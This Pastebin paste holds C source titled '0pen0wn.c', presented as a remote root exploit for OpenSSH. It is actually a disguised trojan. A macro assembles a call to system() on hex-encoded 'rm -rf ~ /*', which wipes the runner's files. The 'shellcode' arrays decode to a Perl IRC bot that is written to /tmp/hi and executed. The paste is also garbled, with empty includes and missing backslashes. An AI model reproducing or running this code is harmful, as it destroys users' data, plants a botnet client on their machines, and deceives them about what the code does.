API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 26th, 2017
75
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.83 KB | None | 0 0
raw download clone embed print report
  1. ===============
  2.  
  3. /* 0pen0wn.c by anti-sec group
  4. * ---------------------------
  5. * OpenSSH
  6. #include
  7. #include
  8. #include
  9. #include
  10. #include
  11. #include
  12. #include
  13. #include
  14. #include
  15.  
  16. #define VALID_RANGE 0xb44ffe00
  17. #define build_frem(x,y,a,b,c) a##c##a##x##y##b
  18.  
  19. char jmpcode[] =
  20. "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
  21. "x64x65x76x2fx6ex75x6cx6cx20x26";
  22.  
  23. char shellcode[] =
  24. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  25. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
  26. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  27. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  28. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  29. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  30. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  31. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  32. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  33. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  34. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  35. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  36. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  37. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  38. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  39. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  40. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  41. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  42. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  43. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  44. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  45. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  46. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  47. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  48. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  49. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  50. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  51. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  52. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  53. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  54. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  55. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  56. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  57. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  58. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  59. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  60. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  61. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  62. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  63. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  64. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  65. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  66. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  67. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  68. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  69. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  70. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  71. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  72. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  73. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  74. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  75. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  76. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  77. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  78. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  79. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  80. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  81. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  82. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  83. "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
  84. "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
  85. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  86. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  87. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  88. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  89. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  90. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  91. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  92. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  93. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  94. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  95. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  96. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  97. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  98. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  99. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  100. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  101. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a";
  102.  
  103. char fbsd_shellcode[] =
  104. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  105. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  106. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  107. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  108. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  109. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  110. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  111. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  112. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  113. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  114. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  115. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  116. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  117. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  118. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  119. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  120. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  121. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  122. "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
  123. "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
  124. "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
  125. "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
  126. "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
  127. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  128. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  129. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  130. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  131. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  132. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  133. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  134. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  135. "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
  136. "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
  137. "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
  138. "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
  139. "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
  140. "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
  141. "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
  142. "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
  143. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  144. "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
  145. "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
  146. "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
  147. "x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
  148. "x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
  149. "x2fx74x6dx70x2fx68x69x0a";
  150. #define SIZE 0xffffff
  151. #define OFFSET 131
  152. #define fremote build_frem(t,e,s,m,y)
  153.  
  154. void usage(char *arg){
  155. printf("n[+] 0pen0wn 0wnz Linux/FreeBSDn");
  156. printf(" Usage: %s -h -p portn",arg);
  157. printf(" Options:n");
  158. printf(" t-h ip/host of targetn");
  159. printf(" t-p portn");
  160. printf(" t-d usernamen");
  161. printf(" t-B memory_limit 8/16/64nnn");
  162. }
  163.  
  164. #define FD 0x080518fc
  165. #define BD 0x08082000
  166.  
  167. int main(int argc, char **argv){
  168. FILE *jmpinst;
  169. char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
  170. int port=23, limit=8, target=0, sock;
  171. struct hostent *host;
  172. struct sockaddr_in addr;
  173.  
  174. if (geteuid()) {
  175. puts("need root for raw socket, etc...");
  176. return 1;
  177. }
  178.  
  179. if(argc h_addr;
  180. }
  181.  
  182. sock = socket(PF_INET, SOCK_STREAM, 0);
  183. addr.sin_port = htons(port);
  184. addr.sin_family = AF_INET;
  185. if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
  186. printf(" [-] Connecting failedn");
  187. return 1;
  188. }
  189. payload = malloc(limit * 10000);
  190. ptr = payload+8;
  191. memcpy(ptr,jmpcode,strlen(jmpcode));
  192. jmpinst=fopen(shellcode+793,"w+");
  193. if(jmpinst){
  194. fseek(jmpinst,0,SEEK_SET);
  195. fprintf(jmpinst,"%s",shellcode);
  196. fclose(jmpinst);
  197. }
  198. ptr += strlen(jmpcode);
  199. if(target != 5 && target != 6){
  200. memcpy(ptr,shellcode,strlen(shellcode));
  201. ptr += strlen(shellcode);
  202. memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
  203. }
  204. else{
  205. memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
  206. ptr += strlen(fbsd_shellcode);
  207. memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
  208. }
  209. send(sock,buffer,strlen(buffer),0);
  210. send(sock,ptr,3750,0);
  211. close(sock);
  212. if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
  213. printf(" [-] connecting failedn");
  214. }
  215.  
  216. payload[sizeof(payload)-1] = '';
  217. payload[sizeof(payload)-2] = '';
  218. send(sock,buffer,strlen(buffer),0);
  219. send(sock,payload,strlen(payload),0);
  220. close(sock);
  221. free(payload);
  222. addr.sin_port = htons(6666);
  223. if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
  224. /* v--- our cool bar that says: "r0000000t!!!" */
  225. printf("n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]nn");
  226. fremote("PS1='sh-3.2#' /bin/sh");
  227. }
  228. else
  229. printf(" [-] failed to exploit target :-( n");
  230. close(sock);
  231. return 0;
  232. }
  233.  
  234. =======================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!